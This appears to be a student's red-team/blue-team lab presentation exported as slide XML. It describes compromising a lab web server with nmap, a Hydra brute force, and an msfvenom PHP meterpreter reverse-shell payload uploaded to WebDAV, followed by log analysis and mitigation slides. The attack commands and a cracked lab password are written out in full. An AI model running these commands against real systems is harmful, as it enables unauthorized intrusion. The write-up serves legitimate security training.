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 Thin"/>
      <p:regular r:id="rId35"/>
      <p:bold r:id="rId36"/>
      <p:italic r:id="rId37"/>
      <p:boldItalic r:id="rId38"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold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29F5F3-E2C8-4409-BB19-35D94CC6A893}">
  <a:tblStyle styleId="{8E29F5F3-E2C8-4409-BB19-35D94CC6A8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Black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Thin-regular.fntdata"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide28.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-italic.fntdata"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-bold.fntdata"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-bold.fntdata"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin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3baaffeb9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13baaffeb9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3ca78888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3ca78888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3baaffeb9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3baaffeb9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3ca78888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3ca78888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3d03f092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13d03f092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baaffeb9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3baaffeb9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0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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2435650" y="3524525"/>
            <a:ext cx="5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Submitted by Mauritz Majelyne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Brute-Force Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1119" name="Google Shape;111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I discovered the existence of the secret folder and knew that it was managed by Ashton, I used Hydra to attempt to brute-force my way into this folder using the username “ashton”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6" name="Google Shape;112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exploit was successful and gave me the password “leopoldo”. With this password, I was able to gain access to the folder where I found detailed instructions on how to access the company’s webdav server using Ryan’s password (which was easily unshashed).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0" name="Google Shape;1130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1" name="Google Shape;113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the command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Hydra -l”webdav” -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder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(see next slide for output)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Brute-Force Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140" name="Google Shape;1140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1" name="Google Shape;1141;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="23626" l="10377" r="34598" t="10743"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905550" y="733775"/>
            <a:ext cx="5179523" cy="440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Brute-Force Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1147" name="Google Shape;114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8" name="Google Shape;1148;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="64699" l="2458" r="13915" t="25152"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="112872" y="712578"/>
            <a:ext cx="8918250" cy="7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65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="51122" l="4216" r="27116" t="30728"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="346481" y="1654566"/>
            <a:ext cx="8451044" cy="2754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upload to webdav server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1155" name="Google Shape;1155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I gained access to the webdav server using the instructions found in secret_folder, I was able to then create a payload using msfvenom and successfully upload and execute that to the webdav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8" name="Google Shape;1158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9" name="Google Shape;1159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0" name="Google Shape;1160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6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2" name="Google Shape;1162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3" name="Google Shape;1163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4" name="Google Shape;1164;p6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me to establish a reverse tcp shell using the metasploit msfconsole.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6" name="Google Shape;1166;p6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7" name="Google Shape;1167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8" name="Google Shape;1168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6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6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Commands I used were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msfvenom php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=4444 -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f raw -o shell.php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(see next slide for screenshots of output)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upload to webdav server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1176" name="Google Shape;1176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7" name="Google Shape;1177;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="10725" l="2234" r="26611" t="70061"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="35825" y="1548675"/>
            <a:ext cx="9072349" cy="1865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upload to webdav server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1183" name="Google Shape;1183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4" name="Google Shape;1184;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="22563" l="2044" r="49966" t="14305"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2235075" y="725312"/>
            <a:ext cx="4799649" cy="39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upload to webdav server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1190" name="Google Shape;1190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1" name="Google Shape;1191;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="10595" l="34530" r="9953" t="32833"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2494537" y="1106913"/>
            <a:ext cx="4154925" cy="323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70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8" name="Google Shape;1198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04" name="Google Shape;1204;p71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5" name="Google Shape;1205;p71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portscan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>occurred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> on July 1st between 01:20pm and 01:25pm.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 that time 60,479 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>packets were sent form 192.168.1.90.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is indicated by the fact that a high volume of packets were sent by the same ip address to a variety of different ports and IPs, in a very short time span.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1206" name="Google Shape;120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71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="21303" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457275" y="2418375"/>
            <a:ext cx="8409298" cy="24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3" name="Google Shape;1213;p72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4" name="Google Shape;1214;p72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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>request for the secret folder occurred on July 6th at 23:30.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A total of 6 requests were made.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requested and returned  file was ‘connect_to_corp_server’. This file contained instructions on how to connect to the WEBDAV server</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1215" name="Google Shape;12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475" y="1793275"/>
            <a:ext cx="6208925" cy="33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2" name="Google Shape;1222;p73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23" name="Google Shape;1223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3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15,952 requests made during the attack.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attacker made 15,950 requests before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>discovering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> the password.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1225" name="Google Shape;12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425" y="1620175"/>
            <a:ext cx="6983143" cy="329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2" name="Google Shape;1232;p74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33" name="Google Shape;1233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4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43,281 requests made to the /webdav server.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requested files were passwd.dav and shell.php.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1235" name="Google Shape;123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74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="15917" l="8788" r="37783" t="11535"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1762250" y="1467775"/>
            <a:ext cx="4885625" cy="320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75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3" name="Google Shape;1243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49" name="Google Shape;1249;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="47403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port scans?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set an alarm which would notify us when a large volume of request are being made from the same IP address in a short time span.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Alternatively we could set an alarm when our closed ports receive a high volume of request in a certain time span (in case the attackers use multiple IPs).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possible threshold could be 10,,000 requests within 5 min. Of course, this is subject to change and dependent on our web traffic.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1250" name="Google Shape;1250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configurations can be set on the host to mitigate port scans?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start by making sure we have a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>firewall installed which is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> properly configured and that all of our ports are either closed or filtered.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could also install an IPS system which could detect and block  port scans.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required command lines.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set the firewall to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> deny, except the https/http ports and make sure those ports are being monitored by an IPS.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56" name="Google Shape;1256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unauthorized access?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set and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>alarm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to alert us when an “unauthorized” ip address (non-whitelisted) tries to connect to this directory.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also set an alarm for a high volume of unauthorized requests to this directory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would set the threshold for 10 unauthorized within 10 minutes.This is subject to change based on typical user behavior.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7" name="Google Shape;1257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unwanted access?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create a whitelist of IP addresses which would be allowed access to the hidden directory, restricting access to the unknown IPs.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remove this directory from this publicly accessible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required command lines.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remove the directory we would use the rmdir -r command.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Whitelisting IPs would depend on the firewall you used. One example could be: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-sudo ufw allow from [IP address]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63" name="Google Shape;1263;p7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brute force attacks?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set an alarm which would notify us when a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>unusually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> high amount of unauthorized access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>responses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> are returned from the server.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 potential threshold here would be 10 or more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>within 5 min.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4" name="Google Shape;1264;p7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brute force attacks?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configure the host machine to execute an automatic account lockout after a certain number of unauthorized access responses. (let’s say 5). We could also configure the use of two-factor authentication.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the required command line(s).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lockout we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>would</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> set the following parameters: lockoutDuration, lockoutObservationWindow, lockoutThreshold.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70" name="Google Shape;1270;p7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access to this directory?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set an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>alarm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> when an unauthorized IP address is trying to connect to this directory. We can also set one when too many failed attempts to login are being registered.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threshold for “blacklisted IPs” should be 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Potentially 15 failed attempts within 5 min.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1" name="Google Shape;1271;p7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control access?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create a whitelist of IP addresses which would be allowed access to the hidden directory, restricting access to the unknown IPs.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also block access to the webDAV server  over the internet by closing ports 80 (http) and 443 (https)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the required command line(s).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commands d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>epend on the firewall you used. One example could be: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-sudo ufw allow from [IP address]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-sudo ufw deny [PORT]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77" name="Google Shape;1277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file uploads?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set an alarm when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>an unauthorized IP is trying to upload files to this server or connect to it over ports 80, 443, or 4444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her would be 1 attempt for any unauthorized IP address.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9" name="Google Shape;1279;p8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file uploads?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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> configure the server to only allow uploads from whitelisted IP addresses. We </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> block any remote uploads over the internet. We could  also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>specify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>file types</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> would be allowed to be uploaded.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the required command line.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Block port 80 and 443 on this server, create a whitelist of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>trusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> IPs and configure which file types users are authorized to upload.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2027100" cy="37890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192.168.1.1/24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Netmask:255.255.255.255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IPv4:192.168.1.1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OS:Windows 11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Hostname: Hyper-V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 GNU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Ubuntu 18.04.1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 Ubuntu 18.04.4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" y="815100"/>
            <a:ext cx="6699599" cy="40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{8E29F5F3-E2C8-4409-BB19-35D94CC6A893}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Manager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Acts as hypervisor to our virtual machines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Functions as our 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Functions as a web server (target machine)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Functions as an ELK server set up to log data from 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{8E29F5F3-E2C8-4409-BB19-35D94CC6A893}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CVE-2019-6579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80 on target machine, allowing http traffic.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us to access the web server on the target machine through unsecured http traffic.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were no mitigations strategies in place to defend against a multitude of failed login attempts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us to use software such as hydra to brute force our way into Ashton’s account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upload to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we cracked the credentials we were able to upload .php file to webdav server, allowing us to establish a reverse shell.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us to execute a payload on target machine and establish reverse shell.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CVE-2019-6579 (open port 80:http)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started by using nmap to scan my network. Once I noticed that the web server had an open port 80 listening for http traffic, I used combination of dirb and my browser, to snoop around.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exploit allowed me to freely explore the company server and gave me valuable information on their team and procedures.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gain important potential usernames for a brute-force, and discovered that a folder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existed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called “secret folder”,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which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was of interest to me.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command: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Nmap -sV 192.168.1.0/24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(see following slide for output)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CVE-2019-6579 (open port 80:http)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62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9672" l="14861" r="4415" t="4959"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1977150" y="717375"/>
            <a:ext cx="5478000" cy="41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